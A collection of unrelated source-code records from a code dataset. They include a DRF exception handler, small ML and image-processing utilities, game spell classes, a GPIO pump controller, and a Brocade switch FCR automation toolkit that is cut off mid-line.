+{"seq_id":"564252634","text":"from rest_framework import exceptions\nfrom rest_framework.views import exception_handler\n\n\ndef custom_exception_handler_simple(exc, context):\n \"\"\"Handle simple drf exceptions.\n\n This custom exception handler for django REST framework wraps\n ValidationErrors into field `data` and adds `detail` field with\n first non field error or message:\n Unfortunately, there are some problems with the data you committed\n\n \"\"\"\n if isinstance(exc, exceptions.ValidationError):\n if \"non_field_errors\" in exc.detail:\n exc.detail = {\n \"data\": exc.detail,\n \"detail\": exc.detail[\"non_field_errors\"][0]\n }\n else:\n exc.detail = {\n \"data\": exc.detail,\n \"detail\": \"Unfortunately, there are some problems with \"\n \"the data you committed\"\n }\n\n return exception_handler(exc, context)\n","sub_path":"project_template/libs/api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222634757","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 21 00:02:08 2016\n\n@author: zz\n\"\"\"\n\nfrom RFCIWELM import RFCIWELM\nfrom util import *\n\ntrain_data, train_label, test_data, test_label = loadData(0.1)\nfeature_dim = train_data.shape[1]\nlabel_dim = train_label.shape[1]\n \ntrain_data = normalizeData(train_data)\ntest_data = normalizeData(test_data)\n\nrfciwelm = RFCIWELM(28, 28, feature_dim*10, label_dim, 'lite', 'rf-ciw', train_data, train_label)\n\nrfciwelm.trainModel(train_data, train_label)\n#rfciwelm.save(r\"D:\\workspace\\Data\\ELM\\weights\\rfciwelm\")\nrfciwelm.testModel(test_data, test_label)","sub_path":"testRFCIWELM.py","file_name":"testRFCIWELM.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"238107769","text":"from pdcresource import *\nfrom pdcglobal import *\nfrom magic import Spell\nfrom effects import generic_effects\nclass OrderSpell(Spell):\n def __init__(self):\n Spell.__init__(self)\n self.color = WHITE\n self.type = ST_ORDER\n\nclass Regeneration(OrderSpell):\n def __init__(self):\n OrderSpell.__init__(self)\n self.phys_cost = 25\n self.mind_cost = 65\n self.name = 'Regeneraton'\n self.infotext = 'Target regenerates'\n \n def target_choosen(self, pos):\n target = self.game.get_actor_at(pos)\n if target == None:\n self.game.shout('Your spell fizzles')\n else:\n self.game.shout('%s regenerate %s' % (self.caster.name, target.name))\n r = generic_effects.RegenerationEffect(target, self.caster)\n r.tick()\n \n\nclass LesserHealing(OrderSpell):\n def __init__(self):\n OrderSpell.__init__(self)\n self.phys_cost = 5\n self.mind_cost = 25\n self.name = 'Lesser Healing'\n self.infotext = 'Cures small wounds'\n \n def target_choosen(self, pos):\n target = self.game.get_actor_at(pos)\n if target == None:\n self.game.shout('Your spell fizzles')\n else:\n amount = d(self.caster.mind / 10) + 3\n if target.cur_health + amount > target.health:\n amount = target.health - target.cur_health\n self.game.do_damage(target, -amount)\n self.game.shout('%s healed %s' % (self.caster.name, target.name))\n\n \nclass Healing(OrderSpell):\n def __init__(self):\n OrderSpell.__init__(self)\n self.phys_cost = 10\n self.mind_cost = 55\n self.name = 'Healing'\n self.infotext = 'Cures wounds'\n \n def target_choosen(self, pos):\n target = self.game.get_actor_at(pos)\n if target == None:\n self.game.shout('Your spell fizzles')\n else:\n amount = d(self.caster.mind / 10) + d(self.caster.mind / 10) + 5\n self.game.do_damage(target, -amount)\n self.game.shout('%s healed %s' % (self.caster.name, target.name))\n\n","sub_path":"src/magic/order_spells.py","file_name":"order_spells.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"500956001","text":"import random\nfrom enum import Enum\nfrom torch.utils.data import Dataset\nimport numpy as np\n\nclass DATA_TYPE(Enum):\n TRAIN=0\n VALID=1\n\ntitles=['短期预测湿度','短期预测风速','短期预测温度','短期预测气压','实际功率','实际风速']\nclass power_dataSet(Dataset):\n def __init__(self,path,type):\n '''\n 创建可兼容pytorch的数据集,在所有数据中,取2/3作为训练集,1/3作为测试集\n :param path: 字符串,指明文件地址\n :type DATA_TYPE类型,指明使用验证数据还是训练数据\n '''\n self.type=type\n data=[]\n ratio=0.7\n with open(path) as f:\n lines=f.readlines()\n for line in lines:\n line=line.split(',')\n keep=True\n try:\n line = [float(i) for i in line]\n except:\n keep=False\n if keep:\n data.append(np.array(line))\n train_idxs=set(random.sample(range(len(data)),int(len(lines)*ratio)))\n self.train_data=[]\n self.valid_data=[]\n for i in range(len(data)):\n if i in train_idxs:\n self.train_data.append(data[i])\n else:\n self.valid_data.append(data[i])\n\n\n def __len__(self):\n if self.type==DATA_TYPE.TRAIN:\n return len(self.train_data)\n elif self.type==DATA_TYPE.VALID:\n return len(self.valid_data)\n\n def __getitem__(self, index):\n if self.type==DATA_TYPE.TRAIN:\n return self.train_data[index]\n elif self.type==DATA_TYPE.VALID:\n return self.valid_data[index]\n\n def setDataType(self,type):\n self.type=type\n\ndef get_loss(ground_truth,pridect):\n loss=ground_truth-pridect\n lenth=loss.size\n loss=loss**2\n loss=np.sum(loss)\n loss=loss/lenth\n loss=loss**0.5\n return loss\n\nif __name__ == '__main__':\n # 用于测试dataset类的读取能力\n dataset=power_dataSet('..\\\\bin\\\\未处理_大帽山风电场_2018-01-01_2019-01-01.csv',DATA_TYPE.TRAIN)\n pass","sub_path":"script/dataSet.py","file_name":"dataSet.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525430","text":"from tkinter import Label\nfrom PIL.Image import open\nfrom PIL.ImageTk import PhotoImage\n\n\nclass myButton(Label):\n def __init__(self, master, **kw):\n \"\"\"\n :param kw: [command, text, theme, font, img, img_bg]\n \"\"\"\n self.kw = kw\n self.command = lambda *args: print(\"Working\")\n label_kw, my_kw = self.parse_kw()\n self.dark, self.normal, self.light = my_kw[\"theme\"]\n\n super().__init__(master, **label_kw)\n self.configure(relief=\"raised\")\n\n if \"img\" in my_kw:\n image = open(my_kw[\"img\"])\n photo = PhotoImage(image)\n if \"img_bg\" in my_kw:\n self.configure(image=photo, bg=my_kw[\"bg\"])\n else:\n self.configure(image=photo)\n self.image = photo\n else:\n self.configure(bg=self.normal, fg=self.light)\n\n self.bind('', lambda *args: self.clicked())\n self.bind('', lambda *args: self.unclicked())\n\n def parse_kw(self):\n my_kw = {}\n for key, value in self.kw.items():\n if key in [\"bg\", \"background\", \"fg\", \"foreground\", \"relief\"]:\n del self.kw[key]\n\n if \"command\" in self.kw:\n self.command = self.kw[\"command\"]\n del self.kw[\"command\"]\n\n if \"img\" in self.kw:\n my_kw[\"img\"] = self.kw[\"img\"]\n del self.kw[\"img\"]\n if \"img_bg\" in self.kw:\n my_kw[\"img_bg\"] = self.kw[\"img_bg\"]\n del self.kw[\"img_bg\"]\n\n if \"theme\" in self.kw:\n my_kw[\"theme\"] = self.kw[\"theme\"]\n del self.kw[\"theme\"]\n else:\n my_kw[\"theme\"] = ('#435661', '#557282', '#defffc')\n\n return self.kw, my_kw\n\n def clicked(self):\n self.configure(relief=\"sunken\")\n\n def unclicked(self):\n self.configure(relief=\"raised\")\n self.command()\n\n def trigger(self):\n root = self.winfo_toplevel()\n self.configure(relief=\"sunken\")\n root.update()\n root.after(100, self.unclicked())\n","sub_path":"FaceSetBuilder/myTkinter.py","file_name":"myTkinter.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"28098941","text":"def bucket_sort(input_list):\r\n # Находим максимальное значение в списке. Затем используем длину списка, чтобы определить, какое значение в списке попадет в какой блок\r\n max_value = max(input_list)\r\n size = max_value/len(input_list)\r\n\r\n # Создаем n пустых блоков, где n равно длине входного списка\r\n buckets_list= []\r\n for x in range(len(input_list)):\r\n buckets_list.append([]) \r\n\r\n # Помещаем элементы списка в разные блоки на основе size\r\n for i in range(len(input_list)):\r\n j = int (input_list[i] / size)\r\n if j != len (input_list):\r\n buckets_list[j].append(input_list[i])\r\n else:\r\n buckets_list[len(input_list) - 1].append(input_list[i])\r\n\r\n # Сортируем элементы внутри блоков с помощью сортировки вставкой\r\n for z in range(len(input_list)):\r\n insertion_sort(buckets_list[z])\r\n \r\n # Объединяем блоки с отсортированными элементами в один список\r\n final_output = []\r\n for x in range(len (input_list)):\r\n final_output = final_output + buckets_list[x]\r\n return final_output","sub_path":"блочная сортировка1.py","file_name":"блочная сортировка1.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"359423744","text":"\"\"\" Deskews file after getting skew angle \"\"\"\nimport numpy as np\nfrom skimage.color import rgb2gray\nfrom skimage.transform import rotate\nfrom skimage.feature import canny\nfrom skimage.transform import hough_line, hough_line_peaks\n\n\nclass Deskew:\n \n piby4 = np.pi / 4\n\n def __init__(self, input_file, r_angle = 0, sigma=3.0, num_peaks=10):\n\n self.input_file = input_file\n self.r_angle = r_angle\n self.sigma = sigma\n self.num_peaks = num_peaks\n #self.skew_obj = SkewDetect(self.input_file)\n\n def deskew(self):\n \n img = self.input_file\n #img = io.imread(self.input_file)\n res = self.determine_skew(img)\n angle = res['Estimated Angle']\n\n if angle >= 0 and angle <= 90:\n rot_angle = angle - 90 + self.r_angle\n if angle >= -45 and angle < 0:\n rot_angle = angle - 90 + self.r_angle\n if angle >= -90 and angle < -45:\n rot_angle = 90 + angle + self.r_angle\n\n rotated = rotate(img, rot_angle, resize=False, mode=\"edge\")\n return rotated\n\n def determine_skew(self, img_file):\n\n img = img_file.copy()\n img = rgb2gray(img)\n edges = canny(img, sigma=self.sigma)\n h, a, d = hough_line(edges)\n _, ap, _ = hough_line_peaks(h, a, d, num_peaks=self.num_peaks)\n\n if len(ap) == 0:\n return {\"Image File\": img_file, \"Message\": \"Bad Quality\"}\n\n absolute_deviations = [self.calculate_deviation(k) for k in ap]\n average_deviation = np.mean(np.rad2deg(absolute_deviations))\n ap_deg = [np.rad2deg(x) for x in ap]\n\n bin_0_45 = []\n bin_45_90 = []\n bin_0_45n = []\n bin_45_90n = []\n\n for ang in ap_deg:\n\n deviation_sum = int(90 - ang + average_deviation)\n if self.compare_sum(deviation_sum):\n bin_45_90.append(ang)\n continue\n\n deviation_sum = int(ang + average_deviation)\n if self.compare_sum(deviation_sum):\n bin_0_45.append(ang)\n continue\n\n deviation_sum = int(-ang + average_deviation)\n if self.compare_sum(deviation_sum):\n bin_0_45n.append(ang)\n continue\n\n deviation_sum = int(90 + ang + average_deviation)\n if self.compare_sum(deviation_sum):\n bin_45_90n.append(ang)\n\n angles = [bin_0_45, bin_45_90, bin_0_45n, bin_45_90n]\n lmax = 0\n\n for j in range(len(angles)):\n l = len(angles[j])\n if l > lmax:\n lmax = l\n maxi = j\n\n if lmax:\n ans_arr = self.get_max_freq_elem(angles[maxi])\n ans_res = np.mean(ans_arr)\n\n else:\n ans_arr = self.get_max_freq_elem(ap_deg)\n ans_res = np.mean(ans_arr)\n \n data = {\n \"Image File\": img_file,\n \"Average Deviation from pi/4\": average_deviation,\n \"Estimated Angle\": ans_res,\n \"Angle bins\": angles}\n \n return data\n\n def get_max_freq_elem(self, arr):\n\n max_arr = []\n freqs = {}\n for i in arr:\n if i in freqs:\n freqs[i] += 1\n else:\n freqs[i] = 1\n\n sorted_keys = sorted(freqs, key=freqs.get, reverse=True)\n max_freq = freqs[sorted_keys[0]]\n\n for k in sorted_keys:\n if freqs[k] == max_freq:\n max_arr.append(k)\n\n return max_arr\n \n def calculate_deviation(self, angle):\n\n angle_in_degrees = np.abs(angle)\n deviation = np.abs(Deskew.piby4 - angle_in_degrees)\n\n return deviation\n \n def compare_sum(self, value):\n if value >= 44 and value <= 46:\n return True\n else:\n return False\n","sub_path":"deskew.py","file_name":"deskew.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"236213180","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nclass PumpService ():\n '''\n PumpService-class which control basic functions of a water pump\n Args:\n configFile: .json file with hardware parameters\n Returns:\n PumpService object\n '''\n def __init__ (self,configFile):\n self.configFile = configFile\n self.pump_pin = int(configFile.get('pump_pin',0))\n self.pump_dur = int(configFile.get('pump_dur',0))\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.pump_pin,GPIO.OUT,initial=GPIO.LOW)\n def trigger(self,dur=3):\n GPIO.output(self.pump_pin,GPIO.HIGH)\n sleep(dur)\n GPIO.output(self.pump_pin,GPIO.LOW)\n @staticmethod\n def cleanup():\n GPIO.cleanup()\n","sub_path":"Services/PumpService.py","file_name":"PumpService.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"119634209","text":"#!/usr/bin/env python3\n###############################################################################\n#### Home location is\n####\n###############################################################################\n\"\"\"\nFCR TOOLS - different functions to get information from switches and/or fabrics in regards to FCR configuration\n\n\"\"\"\n\nfrom multiprocessing import Process,Queue\nimport anturlar\nimport liabhar\nimport cofra\nimport switch_playback\nimport sys, os, csv, re, filecmp, difflib, readline\nsys.path.append('/home/automation/22FCR')\nfrom configparser import SafeConfigParser\nimport ast\nimport readline, pprint\nimport EX_PortFlapper\n\n\n\n\"\"\"\nNaming conventions --\n\nmodule_name package_name \nmethod_name ExceptionName \nglobal_var_name instance_var_name\nfunction_parameter_name local_var_name\nGLOBAL_CONSTANT_NAME ClassName\n function_name\n \n\"\"\"\n\ndef test_cofra_functions():\n su = cofra.SwitchUpdate()\n #a = fcri.__getportlist__(\"EX-Port\")\n #b = fcri.all_ex_ports_with_edge_fid()\n print(\"1111111111111111111111111111111\")\n #b = su.playback_add_ports()\n #b = su.switch_power_off_on(\"root\", \"password\")\n print(\"2222222222222222222222222222222\")\n print(b)\n sys.exit()\n \ndef test_anturlar_functions():\n #a = ex_port_list()\n fcri = anturlar.FcrInfo()\n #fabi = anturlar.FabricInfo()\n #zones = anturlar.Zone()\n #si = anturlar.SwitchInfo()\n #su = cofra.SwitchUpdate()\n #a = fcri.__getportlist__(\"EX-Port\")\n #b = fcri.all_ex_ports_with_edge_fid()\n print(\"1111111111111111111111111111111\")\n #b = zones.def_zone()\n b = fcri.fcr_fab_wide_ip()\n print(\"2222222222222222222222222222222\")\n print(b)\n sys.exit()\n \ndef user_start():\n go = False\n start = 'n'\n while not go : \n is_valid = False\n while not is_valid:\n try:\n start = str(input(\"\\n\\n\\n\\nSTART THE TEST ? [y/n] : \"))\n print(\"GGGGGG\")\n is_valid = True \n except EOFError:\n print(\"\\n\\nthere was an error with the input\")\n sys.exit()\n \n if start == 'y':\n go = True\n else:\n sys.exit()\n \n\ndef tbc_creator():\n \n test_file = '/home/RunFromHere/ini/TBC_SwitchMatrix_MASTER.csv'\n tbc_file = '/home/RunFromHere/ini/TBC_Fabric_Services.tbc'\n all_power_ips = []\n try:\n with open(test_file, 'r') as switch_matrix, open(tbc_file, 'r+') as f:\n my_dict = csv.DictReader(switch_matrix)\n for row in my_dict:\n chassisname = (row['Chassisname']) # Resource_type\n ip = (row['IP Address']) # IP\n password = (row['Password']) # Password\n console_1 = (row['Console1 IP']) # CP_0 Console IP\n console_1_port = (row['Console1 Port']) # CP_0 Console Port\n console_2 = (row['Console2 IP']) # CP_1 Console IP\n console_2_port = (row['Console2 Port']) # CP_1 Console Port\n cp0_ip = (row['CP0 IP']) # CP_0 IP\n cp1_ip = (row['CP1 IP']) # CP_1 IP\n fabric_name = (chassisname) #Fabric name\n admin_pwd = (row['Password']) # Admin Password\n root_pwd = (row['Password']) # Root Password\n pwr_1 = (row['Power1 IP']) # Power_1\n pwr_1_port = (row['Power1 Port']) # Power_1_Port\n pwr_2 = (row['Power2 IP']) # Power_2\n pwr_2_port = (row['Power2 Port']) # Power_2_Port\n pwr_3 = (row['Power3 IP']) # Power_3\n pwr_3_port = (row['Power3 Port']) # Power_3_Port\n pwr_4 = (row['Power4 IP']) # Power_3\n pwr_4_port = (row['Power4 Port']) # Power_3_Port\n fos_resources = [chassisname, ip, password, console_1,console_1_port,console_2,console_2_port,cp0_ip, cp1_ip,fabric_name]\n power_ips = [pwr_1, pwr_2, pwr_3, pwr_4]\n for i in power_ips:\n if i != '' and i not in all_power_ips:\n all_power_ips += [i]\n\n chassis_name = (\"%s_resource_type fos\" % chassisname)\n ip = \"%s_ip %s\" % (chassisname, ip)\n console_1 = \"%s_cp0_console %s %s\" % (chassisname, console_1, console_1_port)\n cp0ip = \"%s_cp0_ip %s\" % (chassisname, cp0_ip)\n cp1ip = \"%s_cp0_ip %s\" % (chassisname, cp1_ip)\n if (console_2):\n console_2 = \"%s_cp1_console %s %s\" % (chassisname, console_2, console_2_port)\n cp0ip = \"%s_cp0_ip %s\" % (chassisname, cp0_ip)\n cp1ip = \"%s_cp1_ip %s\" % (chassisname, cp1_ip)\n fabric_name = \"%s_fabric_name %s\" % (chassisname, chassisname)\n root_pwd = \"%s_root_pwd %s\" % (chassisname, root_pwd)\n admin_pwd = \"%s_admin_pwd %s\" % (chassisname, admin_pwd)\n power_1 = \"%s_pwr_1 %s %s\" % (chassisname, pwr_1, pwr_1_port)\n power_ips = pwr_1\n if(pwr_2):\n power_2 = \"%s_pwr_2 %s %s\" % (chassisname, pwr_2, pwr_2_port)\n power_ips = (power_ips , pwr_2)\n if(pwr_3):\n power_3 = \"%s_pwr_3 %s %s\" % (chassisname, pwr_3, pwr_3_port)\n power_ips = (power_ips , pwr_3)\n if(pwr_4):\n power_4 = \"%s_pwr_4 %s %s\" % (chassisname, pwr_4, pwr_4_port)\n power_ips = (power_ips, pwr_4)\n admin = \"%s_cp0_ip %s\" % (chassisname, cp1_ip)\n f.write(chassis_name+\"\\n\")\n f.write(ip+\"\\n\")\n f.write(console_1+\"\\n\")\n if (console_2):\n f.write(console_2+\"\\n\")\n f.write(cp0ip+\"\\n\")\n f.write(cp1ip+\"\\n\")\n f.write(fabric_name+\"\\n\")\n f.write(root_pwd+\"\\n\")\n f.write(admin_pwd+\"\\n\")\n f.write(power_1+\"\\n\")\n if (pwr_2):\n f.write(power_2+\"\\n\")\n if (pwr_3):\n f.write(power_3+\"\\n\")\n if (pwr_4):\n f.write(power_4+\"\\n\")\n f.write(\"\\n\\n\\n\")\n for i in all_power_ips:\n power_1 = \"%s_resource_type power_tower\" % i\n ip = \"%s_ip %s\" % (i, i)\n login = \"%s_login %s\" % (i, \"user\")\n pwd = \"%s_password %s\" % (i, \"pass\")\n f.write(power_1+\"\\n\")\n f.write(ip+\"\\n\")\n f.write(login+\"\\n\")\n f.write(pwd+\"\\n\")\n f.write(\"\\n\\n\")\n print(\"\\n\\nALL FINISHED\\n\\n\")\n print(\"\\n\\nFILE WRITTEN TO: %s\\n\\n\" % tbc_file)\n except FileNotFoundError:\n print('\\n\\nFile(s) Not Found (Line 158 in fcr_tools.py)')\n return(False)\n \n\n \ndef ha_failover( times=1):\n \"\"\"\n do HA failover on directors\n do hareboot on pizza box\n \"\"\"\n #### steps\n #### 1. Determine Pizza box or Director\n #### 2. save username and password\n #### 3. HA Failover or HA reboot\n #### 4. wait some time\n #### 5. reconnect\n\n sw_info = anturlar.SwitchInfo()\n print(sw_info)\n ip_addr = sw_info.ipaddress()\n chassis = sw_info.am_i_director\n #sys.exit()\n while times > 0:\n print(\"\\n\\n\\n\")\n print(\"@\"*60)\n print(\"HA Failovers remaining -- %s \" % times)\n print(\"@\"*60)\n times -= 1\n liabhar.count_down(10)\n if chassis:\n capture = anturlar.fos_cmd(\"echo Y | hafailover\") \n else:\n capture = anturlar.fos_cmd(\"hareboot\")\n liabhar.count_down(300)\n tn = anturlar.connect_tel_noparse(ip_addr,'root','password')\n switch_sync = sw_info.synchronized()\n print(\"\\n\\n\")\n print(\"@\"*60)\n print(\"VALUE OF switch_sync is -- %s \" % switch_sync)\n print(\"@\"*60)\n while switch_sync is False:\n liabhar.count_down(120)\n switch_sync = sw_info.synchronized()\n print(\"\\n\\n\")\n print(\"@\"*60)\n print(\"The VALUE OF switch_sync is -- %s \" % switch_sync)\n print(\"@\"*60)\n \n return(tn)\n \ndef file_diff(a,b,extend_name=\"\"):\n \"\"\"\n Compare two files for differences, print only differences to console and\n put in a file in logs directory.\n \"\"\"\n\n #a = \"/home/RunFromHere/logs/10.38.36.67.txt\"\n #b = \"/home/RunFromHere/logs/10.38.36.167.txt\"\n #difference = (\"/home/RunFromHere/logs/difference_%s.txt\" % c)\n difference = (\"logs/difference_%s.txt\" % extend_name)\n #filecmp = difflib.Differ()\n \n z = filecmp.cmp(a,b)\n if z == True:\n print(\"\\n\\nThe files are the same\")\n return(True)\n else:\n with open (a) as File1:\n c = File1.readlines() \n with open (b) as File2:\n d = File2.readlines()\n print('\\n')\n for line in difflib.context_diff(c,d, fromfile=(a), tofile=(b), n=0):\n print((line))\n with open (difference, 'w') as differ:\n for line in difflib.context_diff(c,d, fromfile=(a), tofile=(b), n=0):\n differ.write(line) \n return(False) ## false would mean that there are differences \n \ndef portcfgfillword():\n fcr = anturlar.FcrInfo()\n portcfg = fcr.portcfgfillword(3)\n\ndef cfgupload(ftp_ip, ftp_user, ftp_pass, clear = 0):\n \"\"\"\n capture any information for testing of the configdownload \n - including mapspolicy --show\n mapsconfig --show\n flow --show\n flow --show -ctrlcfg\n relayconfig --show\n bottleneckmon --status\n \n then perform configupload\n \n config upload \n \n Nimbus_______________Odin_86__:FID25:root> configupload\n Protocol (scp, ftp, sftp, local) [ftp]: ftp \n Server Name or IP Address [host]: 10.38.38.138\n User Name [user]: ftp2\n Path/Filename [/config.txt]: Odin_configupload.txt\n Section (all|chassis|FID# [all]): all\n Password:\n \n or\n \n configdownload [- all ] [-p ftp | -ftp] [\"host\",\"user\",\"path\"[,\"passwd\"]]\n configdownload [- all ] [-p scp | -scp ] [\"host\",\"user\",\"path\"]\n \n \"\"\"\n sw_info = anturlar.SwitchInfo()\n sw_info_ls = sw_info.ls()\n fid_now = sw_info.ls_now()\n \n cons_out = anturlar.fos_cmd(\" \")\n sw_ip = sw_info.ipaddress()\n \n f = \"%s%s%s\"%(\"logs/Configupload_test_case_file\",sw_ip,\".txt\")\n \n if clear == 1 :\n ff = liabhar.FileStuff(f, 'w+b') #### reset the log file\n else:\n ff = liabhar.FileStuff(f, 'a+b') #### open for appending\n \n header = \"%s%s%s%s\" % (\"\\nCONFIGUPLOAD CAPTURE FILE \\n\", \" sw_info ipaddr \",sw_ip, \"\\n==============================\\n\\n\") \n ff.write(header)\n ff.close()\n \n ff = liabhar.FileStuff(f, 'a+b') #### open the log file for writing\n ff.write(str(sw_info_ls))\n ff.write(\"\\n\"*2)\n \n cons_out = anturlar.fos_cmd(\"setcontext %s\" % fid_now)\n #cons_out = anturlar.fos_cmd(\" \")\n configdown_cmd = (\"configupload -all -p ftp %s,%s,/configs/%s.txt,%s\") % (ftp_ip, ftp_user, sw_ip, ftp_pass)\n ftp_ip, ftp_user, ftp_pass\n cons_out = anturlar.fos_cmd (configdown_cmd)\n\ndef configdl(clear = 0):\n \"\"\"\n capture any information for testing of the configdownload \n - including mapspolicy --show\n mapsconfig --show\n flow --show\n flow --show -ctrlcfg\n relayconfig --show\n bottleneckmon --status\n \n then perform configupload\n \n config upload \n \n Nimbus_______________Odin_86__:FID25:root> configupload\n Protocol (scp, ftp, sftp, local) [ftp]: ftp \n Server Name or IP Address [host]: 10.38.38.138\n User Name [user]: ftp2\n Path/Filename [/config.txt]: Odin_configupload.txt\n Section (all|chassis|FID# [all]): all\n Password:\n \n or\n \n configdownload [- all ] [-p ftp | -ftp] [\"host\",\"user\",\"path\"[,\"passwd\"]]\n configdownload [- all ] [-p scp | -scp ] [\"host\",\"user\",\"path\"]\n \n \"\"\"\n #### capture maps config all FIDS\n #### capture flow config all FIDS\n ####\n \n sw_info = anturlar.SwitchInfo()\n sw_info_ls = sw_info.ls()\n fid_now = sw_info.ls_now()\n \n cons_out = anturlar.fos_cmd(\" \")\n sw_ip = sw_info.ipaddress()\n \n cons_out = anturlar.fos_cmd(\"setcontext %s\" % fid_now)\n #cons_out = anturlar.fos_cmd(\" \")\n configdown_cmd = (\"configdownload -all -p ftp 10.38.35.131,ftp1,/configs/%s.txt,ftp2\") % (sw_ip)\n cons_out = anturlar.fos_cmd (configdown_cmd)\n \ndef fab_wide_proxy_device_numbers():\n \"\"\"\n Retrieve number of proxy device on all backbone switches in fabric. Drop those numbers\n into a file for later retreival (e.g. say after reboot testing). Also return a\n dictionary (e.g {switch_ip: # of proxy devices})\n \"\"\"\n \n fcrinfo = anturlar.FcrInfo()\n backbone_ip = fcrinfo.fcr_backbone_ip()\n print(backbone_ip)\n sys.exit()\n bb_fab_num = (len(backbone_ip))\n proxy_dev_count = []\n for ip in backbone_ip:\n anturlar.connect_tel_noparse(ip,'root','password')\n base = fcrinfo.base_check() # get the base FID number\n if base is not False:\n anturlar.fos_cmd(\"setcontext \" + base)\n get_proxy = fcrinfo.fcr_proxy_dev()\n proxy_dev_count.extend(get_proxy)\n\n else:\n get_proxy = fcrinfo.fcr_proxy_dev()\n proxy_dev_count.extend(get_proxy)\n switch_list_with_proxy_dev = dict(zip(backbone_ip, proxy_dev_count))\n proxy_dev_count = (str(proxy_dev_count))\n f = ('logs/ProxyDev_Count.txt')\n ff = liabhar.FileStuff(f,'w+b') ###open new file or clobber old\n ff.write(proxy_dev_count)\n ff.close()\n print('\\n\\n'+ '='*20) \n print('Backbone Fabric consists of %s switches.' % (len(bb_fab_num)))\n print('IP addresses: Number of proxy devices found')\n print(switch_list_with_proxy_dev)\n print('='*20 + '\\n\\n')\n return(switch_list_with_proxy_dev)\n\ndef switch_status():\n \"\"\"\n Retrieve FCR fabric and return info. Variable #'s:\n 0) Switch name\n 1) IP address\n 1) Chassis or Pizza Box\n 2) VF or not\n 3) FCR Enabled\n 4) Base Configured\n \n return dictionary with {switch_name, ipaddr, chassis, vf_enabled, base, fcr_enabled}}\n \"\"\"\n fcrinfo = anturlar.FcrInfo()\n si = anturlar.SwitchInfo()\n initial_checks = si.switch_status()\n print('\\n\\n'+ '='*20)\n print(\"Switch Name : %s\" % initial_checks[0])\n print(\"IP address : %s\" % initial_checks[1])\n print(\"Chassis : %s\" % initial_checks[2])\n print(\"VF enabled : %s\" % initial_checks[3])\n print(\"FCR enabled : %s\" % initial_checks[4])\n print(\"Base configured : %s\" % initial_checks[5])\n print('='*20 + '\\n\\n')\n switch_info = { 'switch_name' : initial_checks[0],'ipaddr' : initial_checks[1], 'chassis' : initial_checks[2],'vf_enabled' : initial_checks[3], 'fcr_enabled' : initial_checks[4], 'base' : initial_checks[5]}\n return (switch_info)\n\ndef ex_port_list():\n \"\"\"\n Grabs only ONLINE EX-Ports. Parses \"switchshow\" for EX-Ports.\n \"\"\"\n si = anturlar.SwitchInfo()\n ex_list = si.ex_ports()\n \ndef ex_deconfig():\n \"\"\"\n Find all EX-Ports AND VEX-Ports on either director or pizzabox and deconfigure.\n This parses \"portcfgshow\" command for any EX-Port, online or not, and deconfigures. This includes\n VEX ports as well.\n \"\"\"\n si = anturlar.SwitchInfo()\n anturlar.fos_cmd(\"switchdisable\")\n portlist = si.all_ports()\n if si.am_i_director:\n for i in portlist:\n slot = i[0]\n port = i[1]\n pattern = re.compile(r'(?:\\EX\\sPort\\s+)(?P ON)')\n cmd = anturlar.fos_cmd(\"portcfgshow %a/%a\" % (slot, port))\n ex = pattern.search(cmd)\n if ex:\n anturlar.fos_cmd(\"portcfgexport %s/%s %s\"%(slot,port,\"-a 2\"))\n anturlar.fos_cmd(\"portcfgvexport %s/%s %s\"%(slot,port,\"-a 2\"))\n else: \n for i in portlist:\n print(i)\n port = i[1]\n pattern = re.compile(r'(?:\\EX\\sPort\\s+)(?P ON)')\n cmd = anturlar.fos_cmd(\"portcfgshow %a\" % port)\n ex = pattern.search(cmd)\n if ex:\n anturlar.fos_cmd(\"portcfgexport %s %s\"%(port,\"-a 2\"))\n anturlar.fos_cmd(\"portcfgvexport %s %s\"%(port,\"-a 2\"))\n cmd_cap = anturlar.fos_cmd(\"switchenable\")\n print('\\n\\nAll EX_ports found are now deconfigured.')\n return(cmd_cap)\n\ndef ex_slots_find():\n \"\"\"\n Find EX/VEX ports and return slot number/port number.\n \"\"\"\n fcri = anturlar.FcrInfo()\n fcipi = anturlar.FcipInfo()\n vex_port_list = fcri.vex_ports()\n ex_port_list = fcri.ex_ports()\n disabled_port_list = fcri.disabled_ports()\n ge_port_list = fcipi.all_ge_ports()\n print(\"PORTLISTPORTLIST\")\n print(\"VEX_PORTS: %s\" % vex_port_list)\n print(\"EX_PORTS: %s\" % ex_port_list)\n print(\"DISABLED_PORTS: %s\" % disabled_port_list)\n sys.exit(0)\n#################################\n\n if self.am_i_director:\n for i in portlist:\n slot = i[0]\n port = i[1]\n pattern = re.compile(r'(?:\\EX\\sPort\\s+)(?P ON)')\n cmd = fos_cmd(\"portcfgshow %a/%a\" % (slot, port))\n ex = pattern.search(cmd)\n if ex:\n fos_cmd(\"portcfgexport %s/%s %s\"%(slot,port,\"-a2\") )\n else: \n for i in portlist:\n pattern = re.compile(r'(?:\\EX\\sPort\\s+)(?P ON)')\n cmd = fos_cmd(\"portcfgshow %a\" % i)\n ex = pattern.search(cmd)\n if ex:\n fos_cmd(\"portcfgexport \"+i+\" -a2\")\n cmd_cap = fos_cmd(\"switchenable\") \n return(cmd_cap)\n \ndef fcr_state_persist_enabled():\n #print(sys.argv)\n host = (sys.argv[1])\n user = sys.argv[2]\n password = 